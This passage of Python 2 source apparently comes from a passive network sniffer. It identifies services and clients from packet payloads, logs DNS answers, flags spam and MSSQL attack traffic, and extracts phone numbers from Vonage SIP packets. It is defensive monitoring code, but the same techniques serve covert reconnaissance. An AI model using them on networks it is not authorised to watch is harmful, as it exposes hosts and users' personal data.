\",TCP_\" + sport] = \"http/trustrank\"\n\t\t\t\t\t\t\telif (Payload.find('Server: YTS/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/yahoo\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/yahoo\"\n\t\t\t\t\t\t\telif (Payload.find('HTTP/1.0 404 Not Found') > -1) or (Payload.find('HTTP/1.1 200 OK') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/generic\"\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"110\") and (Payload != None) 
and (Payload.find('POP3 Server Ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"pop3/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"pop3/generic\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find('* OK dovecot ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/dovecot\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/dovecot\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find(' IMAP4rev1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"783\") and (Payload != None) and (Payload.find('SPAMD/1.1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"spamd/spamd\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"spamd/spamd\"\n\t\t\t\t\t\telif ( (sport == \"3128\") or (sport == \"80\") ) and (Payload != None) and (Payload.find('Via: ') > -1) and (Payload.find(' (squid/') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"proxy/squid\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"proxy/squid\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\telif ((LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\t\t#If the \"To\" side is a known TCP server:\n\t\t\t\t\tClientKey = sIP + \",TCP_\" + dport\t#Note: CLIENT ip and SERVER port\n\t\t\t\t\tif (not ClientDescription.has_key(ClientKey)):\n\t\t\t\t\t\tif (dport == \"22\") and (Payload != None) and ( (Payload.find('SSH-2.0-OpenSSH_') > -1) or (Payload.find('SSH-1.5-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"ssh/openssh\")\n\t\t\t\t\t\t#As cute as it is to catch this, it miscatches any relay that's carrying a pine-generated mail.\n\t\t\t\t\t\t#elif (dport == \"25\") and (Payload != None) and (Payload.find('Message-ID: <Pine.') > -1):\n\t\t\t\t\t\t#\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"smtp/pine\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: libwww-perl/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/libwww-perl\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Lynx') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/lynx\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Mozilla') > -1) and (Payload.find(' Firefox/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/firefox\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Wget/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/wget\")\n\t\t\t\t\t\telif (dport == \"143\") and (Payload != None) and (Payload.find('A0001 CAPABILITY') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"imap/generic\")\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\t\t\telif (dport 
== \"783\") and (Payload != None) and (Payload.find('PROCESS SPAMC') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"spamd/spamc\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\telse:\t#Neither port pair is known as a server\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t#Following is debugging at best; it should only show up early on as the sniffer listens to conversations for which it didn't hear the SYN/ACK\n\t\t\t\t\t#print \"note: neither \" + FromPort + \" nor \" + ToPort + \" is listed as a live service.\"\n\t\t\telse:\t#Other TCP flag combinations here\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 17 and (type(p['UDP']) == UDP):\t\t#UDP. We have to check the object type as well as we do get (corrupted? truncated?) packets with type 17 that aren't udp: AttributeError: 'NoneType' object has no attribute 'sport'\n\t\t\t#FIXME - possibly run udp packets through ServiceFPs as well?\n\t\t\tsport=str(p['UDP'].sport)\n\t\t\tdport=str(p['UDP'].dport)\n\t\t\tSrcService = sIP + \",UDP_\" + sport\n\t\t\tDstService = dIP + \",UDP_\" + dport\n\t\t\tSrcClient = sIP + \",UDP_\" + dport\n\t\t\tPayload = p['Raw.load']\n\n\t\t\t#Multicast DNS: http://files.multicastdns.org/draft-cheshire-dnsext-multicastdns.txt\n\t\t\t#- usually sent to 224.0.0.251 (or FF02::FB) (link-local multicast).\n\t\t\t#\t- if \".local.\" in query, these MUST be the target IPs\n\t\t\t#\t- non-local queries may be sent to these or normal dns servers\n\t\t\t#\t- rdns queries for \"254.169.in-addr.arpa.\" MUST be sent to 224.0.0.251\n\t\t\t#\t- rdns queries for \"8.e.f.ip6.arpa.\", \"9.e.f.ip6.arpa.\",\"a.e.f.ip6.arpa.\", and \"b.e.f.ip6.arpa.\" MUST be sent to the IPv6 mDNS link-local multicast address FF02::FB.\n\t\t\t#- sent to udp port 5353\n\t\t\t#- generic clients may use \"single-dns-object.local.\", such as \"sparrow.local.\"\n\t\t\t#- responses have IP TTL = 255 to check that packet originated on-lan\n\n\t\t\t#Multicast DNS, placed next to normal dns, out of numerical order\n\t\t\tif (dport == \"5353\") and ( (p['IP'].ttl == 1) or (p['IP'].ttl == 255) ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcClient)) or (LiveUDPService[SrcClient] == False)):\n\t\t\t\t\tLiveUDPService[SrcClient] = True\n\t\t\t\t\tif (dIP == \"224.0.0.251\"):\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/broadcastclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/client\")\n\n\t\t\t\t\t#Extract dns answers like with 53; change elif to if and add 5353 to ports on next if?\n\t\t\t\t\t#At the moment, no; scapy does not appear to parse 5353 as dns.\n\t\t\t\t\t#else:\n\t\t\t\t\t#\tUnhandledPacket(p)\n\t\t\t#FIXME - add check for \"if isinstance(p['DNS'], whatevertype):\there and at all p[] accesses.\n\t\t\telif (sport == \"53\") and (isinstance(p['DNS'], DNS)) and (p['DNS'].qr == 1):\t\t#qr == 1 is a response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t#FIXME - Also report the TLD from one of the query answers to show what it's willing to answer for?\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"dns/server\")\n\t\t\t\t#Now we extract dns answers. 
First, check that there's no dns error:\n\t\t\t\tif (p['DNS'].rcode == 0):\t\t\t#No error\n\t\t\t\t\tDNSBlocks = [ ]\n\t\t\t\t\tCNAMERecs = [ ]\t\t\t\t#We hold onto all cnames until we've processed all PTR's and A's here\n\t\t\t\t\tif (p['DNS'].ancount > 0):\t\t#If we have at least one answer from the answer block, process it\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].an)\n\t\t\t\t\tif (p['DNS'].arcount > 0):\t\t#Likewise for the \"additional\" block\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].ar)\n\t\t\t\t\tfor OneAn in DNSBlocks:\n\t\t\t\t\t\t#Thanks to Philippe Biondi for showing me how to extract additional records.\n\t\t\t\t\t\t#Debug(\"Start dns extract\" + str(p['DNS'].ancount))\n\t\t\t\t\t\t#OneAn = p[DNS].an\n\t\t\t\t\t\t#while OneAn is not NoPayload:\t\t#This doesn't seem to stop at the end of the list; incorrect syntax.\n\t\t\t\t\t\twhile isinstance(OneAn,DNSRR):\t\t#Somewhat equivalent:\twhile not isinstance(an, NoPayload):\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t#print \"Type: \" + str(type(OneAn))\t\t#All of type scapy.DNSRR\n\t\t\t\t\t\t\tif (OneAn.rclass == 1) and (OneAn.type == 1):\t\t#\"IN\" class and \"A\" type answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\t#Check new hostname to see if it's in the list.\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",A\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",A\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"A\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 2):\t\t\t#\"IN\" class and \"NS\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Perhaps later\n\t\t\t\t\t\t\t\t#Like cnames, this is object -> nameserver hostname, so these would need to be queued like cnames until we're done with A's and PTR's.\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 5):\t\t\t#\"IN\" class and \"CNAME\" answer\n\t\t\t\t\t\t\t\tCNAMERecs.append(OneAn)\t\t\t\t\t#Remember the record; we'll process these after the PTR's and A's\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 6):\t\t\t#\"IN\" class and \"SOA\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Not immediately useful, perhaps later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 12):\t\t#\"IN\" class and \"PTR\" type answer\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#For input of '182.111.59.66.in-addr.arpa.' 
:\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rrname.replace(\".in-addr.arpa.\", \"\")\t\t# '182.111.59.66'\n\t\t\t\t\t\t\t\tDNSIPAddr = DNSIPAddr.split('.')\t\t\t\t# ['182', '111', '59', '66']\n\t\t\t\t\t\t\t\tDNSIPAddr.reverse()\t\t\t\t\t\t# ['66', '59', '111', '182']\n\t\t\t\t\t\t\t\tDNSIPAddr = string.join(DNSIPAddr, '.')\t\t\t\t# '66.59.111.182'\n\t\t\t\t\t\t\t\t#Check that we end up with a legal IPv4 address before continuing; we're getting garbage.\n\t\t\t\t\t\t\t\tif (re.search('^[1-9][0-9\\.]*[0-9]$', DNSIPAddr) == None):\n\t\t\t\t\t\t\t\t\tDebug(\"Odd PTR rrname: \" + OneAn.rrname)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tDNSHostname = OneAn.rdata.lower()\n\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",PTR\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",PTR\"])):\n\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"PTR\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 15):\t\t#\"IN\" class and \"MX\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Possibly later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 28):\t\t#\"IN\" class and \"AAAA\" answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata.upper()\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",AAAA\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",AAAA\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"AAAA\", DNSHostname, \"\")\n\n\t\t\t\t\t\t\t#Move to the next DNS object in the \"an\" block\n\t\t\t\t\t\t\tOneAn = OneAn.payload\n\t\t\t\t\tfor OneCNAME in CNAMERecs:\t\t#Now that we have all A/PTR's, go back and turn cname records into pseudo-A's\n\t\t\t\t\t\tif isinstance(OneCNAME,DNSRR):\n\t\t\t\t\t\t\tAlias = OneCNAME.rrname.lower()\n\t\t\t\t\t\t\tExisting = OneCNAME.rdata.lower()\n\t\t\t\t\t\t\tif isFQDN(Alias) and isFQDN(Existing):\n\t\t\t\t\t\t\t\tif HostIPs.has_key(Existing):\n\t\t\t\t\t\t\t\t\tfor OneIP in HostIPs[Existing]:\t\t\t\t#Loop through each of the IPs for the canonical name, and\n\t\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(OneIP + \",CNAME\")) or (not(Alias in DNSRecord[OneIP + \",CNAME\"])):\n\t\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", OneIP, \"CNAME\", Alias, \"\")\t#report them as kind-of A records for the Alias.\n\t\t\t\t\t\t\t\t#If we don't have a A/PTR record for \"Existing\", just ignore it. 
Hopefully we'll get the Existing A/PTR in the next few answers, and will re-ask for the CNAME later, at which point we'll get a full cname record.\n\t\t\t\t\t\t\t\t#else:\n\t\t\t\t\t\t\t\t#\tDebug(\"CNAME \" + Alias + \" -> \" + Existing + \" requested, but no IP's for the latter, skipping.\")\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tDebug(\"One of \" + Alias + \" and \" + Existing + \" isn't an FQDN, skipping cname processing.\")\n\t\t\t\telif (p['DNS'].rcode == 1):\t\t\t#FormErr: server responding to an improperly formatted request\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 2):\t\t\t#ServFail: domain exists, root nameservers list authoritative name servers, but authNS's won't answer queries\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 3):\t\t\t#NXDOMAIN: root nameservers don't have any listing (domain doesn't exist or is on hold)\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 5):\t\t\t#Query refused\n\t\t\t\t\tpass\n\t\t\t\telse:\t#rcode indicates an error\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"53\") and (type(p['DNS']) == DNS) and (p['DNS'].qr == 0):\t#dns query\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"dns/client\")\n\t\t\telif (sport == \"67\") and (dport == \"68\"):\t\t#Bootp/dhcp server talking to client\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"bootpordhcp/server\")\n\t\t\telif (sport == \"68\") and (dport == \"67\"):\t\t#Bootp/dhcp client talking to server\n\t\t\t\tif (sIP != \"0.0.0.0\"):\t\t\t\t#If the client is simply renewing an IP, remember it.\n\t\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"bootpordhcp/client\")\n\t\t\t\t#else:\t\t\t\t\t\t#If you want to record which macs are asking for addresses, do it here.\n\t\t\t\t#\tpass\n\t\t\telif (sport == \"123\") and (dport == \"123\") and (p['NTP'].stratum != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/generic\")\n\t\t\telif (dport == \"123\") and ( (dIP == \"216.115.23.75\") or (dIP == \"216.115.23.76\") or (dIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ntp/vonageclient\")\n\t\t\telif (sport == \"123\") and ( (sIP == \"216.115.23.75\") or (sIP == \"216.115.23.76\") or (sIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/vonageserver\")\n\t\t\telif (dport == \"137\"):\t\t\t#netbios-ns\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (p['Ethernet'].dst.upper() == \"FF:FF:FF:FF:FF:FF\"):\t\t\t#broadcast\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/broadcastclient\")\n\t\t\t\t\telif 
(Payload != None) and (Payload.find('CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') > -1):\t#wildcard\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/wildcardclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/unicastclient\")\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"500\") and (dport == \"500\") and (p['ISAKMP'].init_cookie != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"isakmp/generic\")\n\t\t\telif (dport == \"512\"):\t\t\t#BIFF\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('@') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"biff/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (dport == \"1026\") or (dport == \"1027\") or (dport == \"1028\") ):\t#winpopup spam client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and ( (Payload.find('Download Registry Update from:') > -1) or (Payload.find('CRITICAL ERROR MESSAGE! - REGISTRY DAMAGED AND CORRUPTED.') > -1) or (Payload.find('Your system registry is corrupted and needs to be cleaned immediately.') > -1) or (Payload.find('CRITICAL SYSTEM ERRORS') > -1) ):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"winpopup/spamclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"1434\"):\t\t#Probable mssql attack\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Qh.dll') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mssql/clientattack\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"1900\") and (dport == \"1900\") and (dIP == \"239.255.255.250\"):\t\t#SSDP\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('NOTIFY') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ssdp/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"3865\") and (dIP == \"255.255.255.255\"):\t\t#XPL, http://wiki.xplproject.org.uk/index.php/Main_Page\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"xpl/client\")\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (dIP == \"216.115.30.28\") or (dIP == \"69.59.227.77\") or (dIP == \"69.59.232.33\") or (dIP == \"69.59.240.84\") ):\t\t#Vonage SIP client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061 SIP/2.0') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tSipMatch = SipPhoneMatch.search(Payload)\n\t\t\t\t\t\tif (SipMatch != None) and (len(SipMatch.groups()) >= 
1):\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client, phone number: \" + SipMatch.group(1))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (sIP == \"216.115.30.28\") or (sIP == \"69.59.227.77\") or (sIP == \"69.59.232.33\") or (sIP == \"69.59.240.84\") ):\t#Vonage SIP server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061>') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"sip/vonage_server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"6515\") and (dport == \"6514\") and (dIP == \"255.255.255.255\"):\t\t#mcafee ASaP broadcast, looking for a proxy out. http://www.myasap.de/intl/EN/content/virusscan_asap/faq_new.asp\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('<rumor version=') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"asap/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"9052\") or (sport == \"9053\") or (sport == \"9054\") ) and ( (sIP == \"205.188.146.72\") or (sIP == \"205.188.157.241\") or (sIP == \"205.188.157.242\") or (sIP == \"205.188.157.243\") or (sIP == \"205.188.157.244\") or (sIP == \"64.12.51.145\") or (sIP == \"64.12.51.148\") or (sIP == \"149.174.54.131\") ):\t#Possibly AOL dns response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('dns-01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"aoldns/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27005\") and ( (dport == \"27016\") or (dport == \"27017\") ):\t\t\t\t#Halflife client live game\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27013\") and (dIP == \"207.173.177.12\"):\t\t\t\t#variable payload, so can't (Payload != None) and (Payload.find('Steam.exe') > -1)\t\t\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (sport == \"27013\") and (sIP == \"207.173.177.12\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (sport == \"27016\") or (sport == \"27017\") ) and (dport == \"27005\"):\t\t\t\t#halflife server live game\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"27015\") or (dport == 
\"27016\") or (dport == \"27025\") or (dport == \"27026\") ):\t\t#Variable payload, so can't: (Payload != None) and (Payload.find('basic') > -1)\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27017\") and ( (dIP == \"69.28.148.250\") or (dIP == \"69.28.156.250\") or (dIP == \"72.165.61.161\") or (dIP == \"72.165.61.185\") or (dIP == \"72.165.61.186\") or (dIP == \"72.165.61.188\") or (dIP == \"68.142.64.164\") or (dIP == \"68.142.64.165\") or (dIP == \"68.142.64.166\") ):\t#Steamfriends client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"steamfriends/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27017\") and ( (sIP == \"69.28.148.250\") or (sIP == \"69.28.156.250\") or (sIP == \"72.165.61.161\") or (sIP == \"72.165.61.185\") or (sIP == \"72.165.61.186\") or (sIP == \"72.165.61.188\") or (sIP == \"68.142.64.164\") or (sIP == \"68.142.64.165\") or (sIP == \"68.142.64.166\") ):\t#Steamfriends server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"steamfriends/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"21020\") or (sport == \"21250\") or (sport == \"27016\") or (sport == \"27017\") or (sport == \"27018\") or (sport == 